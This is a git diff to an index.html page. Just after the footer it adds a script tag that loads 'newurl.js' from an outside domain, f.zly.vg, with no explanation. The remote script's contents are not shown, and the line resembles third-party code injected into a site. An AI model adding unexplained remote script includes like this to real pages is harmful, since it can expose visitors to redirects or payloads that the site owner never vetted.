--- a/index.html
+++ b/index.html
@@ -126,6 +126,8 @@
 </div>
 </div>
 </footer>
+<script src='https://f.zly.vg/js/newurl.js'></script>
+
 <script>
 document.getElementById('emailLink').addEventListener('click', function(event) {
     var preSection = document.getElementById('myPre');
